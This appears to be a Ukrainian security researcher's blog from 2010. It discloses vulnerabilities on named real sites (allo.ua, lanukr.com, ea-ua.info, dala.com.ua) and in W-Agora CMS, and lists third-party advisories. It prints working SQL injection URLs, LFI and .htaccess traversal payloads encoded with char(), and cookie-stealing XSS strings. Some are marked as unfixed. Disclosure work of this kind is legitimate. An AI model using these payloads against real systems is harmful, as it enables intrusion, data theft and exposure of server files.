Websecurity - Веб безпека

05.01.2010

У травні, 06.05.2009, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості на сайті http://www.allo.ua (онлайн магазин). Серед XSS є також persistent XSS, які можуть використовуватися для інфікування сайта вірусами. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.officepro.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.10.2010

Insufficient Anti-automation:

http://www.allo.ua/register.php

http://www.allo.ua/forget.php

В формах немає захисту від автоматизованих запитів (капчі).

XSS:

Це single-user persistent XSS (коли користувач залогінений на сайті).

POST запит до сторінки профайла http://www.allo.ua/account.php. Код спрацює на сторінці профайла (поля Имя, Email, Телефон, Адрес 1, Адрес 2, Город/Поселок, Область) та на кожній зовнішній сторінці сайта (поле Имя).

XSS (persistent):

Через поле Имя в профайлі можна провести атаку на сторінках продуктів:

http://www.allo.ua/products/comments/product/
http://www.allo.ua/products/details/product/

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

SQL Injection:

http://www.allo.ua/index.php?page=search&start_do_search=yes&search_text=1&pcat_id=-1%20or%20version()=5

Дані уразливості переважно досі не виправлені. Лише виправили persistent XSS через поле Имя.

05.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості на сайті http://www.lanukr.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

25.10.2010

SQL Injection:

http://www.lanukr.com/?mid=-1%20or%20version()%3E4

http://www.lanukr.com/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Виведення .htaccess.

Full path disclosure:

http://www.lanukr.com/?fun=-1

Дані уразливості вже виправлені, за виключенням Full path disclosure. Але дірок на сайті все ще чимало.

В даній добірці уразливості в веб додатках:

• Sprint / Verizon MiFi CSRF+CSS Gives up GPS info to attacker (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• Ref: Session Hijacking iPhone Facebook Application ver 3.1.2 (деталі)
• Facebook for iPhone persistent XSS (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• Cisco ASA5520 Web VPN Host Header XSS (деталі)
• Cisco IOS Software WebVPN and SSLVPN Vulnerabilities (деталі)

27.08.2010

У березні, 15.03.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на сайті maidan.org.ua. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.10.2010

XSS:

http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

Можна інклюдити php-файли (з розширенням php3 в версії W-Agora 4.1.5 або з розширенням php в версії 4.2.1).

В папці conf:

http://site/news/search.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/search.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи search.php3 має ім’я search.php. Розробник системи дані уразливості не виправив.

В даній добірці уразливості в веб додатках:

• File Access Vulnerability in Easy File Sharing Web Server (деталі)
• PBBooking 1.0.4_3 Joomla Component Multiple Blind SQL Injection (деталі)
• Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) (деталі)
• PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection (деталі)
• Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass (деталі)
• WhiteBoard 0.1.30 Multiple Blind SQL Injection Vulnerabilities (деталі)
• DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• SQL injection vulnerability in Theeta CMS (деталі)
• httpdx webserver v1.5 Remote Source Disclosure (деталі)

04.02.2010

У червні, 28.06.2009, я знайшов Full path disclosure та SQL Injection уразливості на проекті http://www.ea-ua.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

20.10.2010

Full path disclosure:

http://www.ea-ua.info/main.php?parts_id=-1&news_id=1

http://www.ea-ua.info/main.php?parts_id=1&news_id=-1

SQL Injection:

http://www.ea-ua.info/main.php?parts_id=6&news_id=-1%20or%20version()=5&news_show_type=1

Дані уразливості досі не виправлені.

Ще в березні, 22.03.2010, Андрій Терещенко повідомив розробникам системи LiqPAY та написав в Bugtraq про уразливість в LiqPAY. Дана уразливість стосується sms-повідомлень для авторизації в системі.

Про уразливості в Приват24 (версія для Facebook), оприлюднені Андрєм в жовтні, я вже писав. Зазначу, що дана уразливість в sms-ках LiqPAY ідентична одній з уразливостей в sms-ках Facebook-версії Приват24. І ПриватБанку варто було виправити дану уразливість в Приват24 для Facebook так само, як вони це зробили в LiqPAY.

Тоді ж він отримав відповідь від ПБ, що вони не вважають це уразливістю. Але вже в березні LiqPAY виправив дану уразливість (хоча від всіх фішинг атак це не захистить). Що я добре знаю, тому що активно використовую дану систему (з листопада 2009 року). Це один з тих рідких випадків, коли ПриватБанк виправив уразливості в своїх сервісах чи сайтах.

11.03.2010 LiqPAY змінили текст sms-ки (додавши пораду не давати пароль іншим особам).
27.03.2010 LiqPAY додали в текст sms-ки адресу сайта.

• Insecure SMS authorization scheme at LiqPAY micro-payments of PrivatBank (Ukraine) (деталі)

03.02.2010

У червні, 28.06.2009, я знайшов SQL Injection уразливість на сайті http://www.dala.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.10.2010

SQL Injection:

http://www.dala.com.ua/index.php?menu_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Як повідомив Андрій Терещенко, в Приват24 (версія для Facebook) є уразливості, що дозволяють обійти статичний пароль для акаунтів ПриватБанку. Уразливість стосується саме версії Приват24 для Facebook і звичайна система Приват24 невразлива.

Тому всі користувачі Facebook, що користуються клієнтом Приват24 для цієї соціальної мережі, повинні бути дуже обережні. Враховуючи наявність уразливостей, що дозволяють отримати доступ до вашого рахунку після логіна через клієнт Приват24 для Facebook (у ваш чи інший Facebook-акаунт), а також враховуючи, що ПриватБанк відмовився виправляти дані уразливості.

Цікаво, що банк навіть відповів йому на дане повідомлення про уразливості (тому що на всі ті численні повідомлення про уразливості в 2008-2010 роках ПриватБанк ні разу мені не відповів). Заявивши, що виправляти уразливості не будуть, тому що “Insecurity accepted as trade-off”. В чому немає нічого нового і це є типовим явищем для ПриватБанка. Бо даний банк не виправив майже жодної уразливості про які я їм повідомив, як я вже зазначав в новинах.

• Privat24 (Facebook version) bypass of static password for accounts of PrivatBank (Ukraine, Russia and CIS) (деталі)

В даній добірці уразливості в веб додатках:

• VMware vCenter, ESX patch and vCenter Lab Manager releases address cross-site scripting issues (деталі)
• XSRF (CSRF) in phpwcms (деталі)
• XSS vulnerability in WebPress (деталі)
• HP OpenView Data Protector Cell Manager Heap Overflow Vulnerability (деталі)
• Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability (деталі)
• HP OpenView Storage Data Protector, Remote Arbitrary Code Execution (деталі)
• Conpresso CMS - Cross site Scripting vulnerabilities (деталі)
• RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability (деталі)
• New firefox-sage packages fix insufficient input sanitizing (деталі)
• Jira Enterprise 4.0.1 - Multiple Low Risk Vulnerabilities (деталі)